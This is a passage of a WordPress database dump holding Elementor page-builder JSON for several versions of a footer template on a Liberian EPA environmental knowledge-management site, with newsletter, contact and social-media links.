EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.195},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.158,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.677},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.97,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.112},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.132,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.34},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20EKMS.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27119,3942,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27129,3943,'_elementor_edit_mode','builder'),(27130,3943,'_elementor_template_type','footer'),(27131,3943,'_elementor_version','3.4.0'),(27132,3943,'_elementor_pro_version','3.3.6'),(27133,3943,'_wp_page_template','default'),(27134,3943,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.195},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.158,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.677},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.97,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.112},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.132,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.34},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20EKMS.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(27136,3943,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(27138,3944,'_elementor_edit_mode','builder'),(27139,3944,'_elementor_template_type','footer'),(27140,3944,'_elementor_version','3.4.0'),(27141,3944,'_elementor_pro_version','3.3.6'),(27142,3944,'_wp_page_template','default'),(27143,3944,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.910000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.9909999999999996589394868351519107818603515625,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.92699999999999960209606797434389591217041015625},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.14699999999999846522769075818359851837158203125},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, 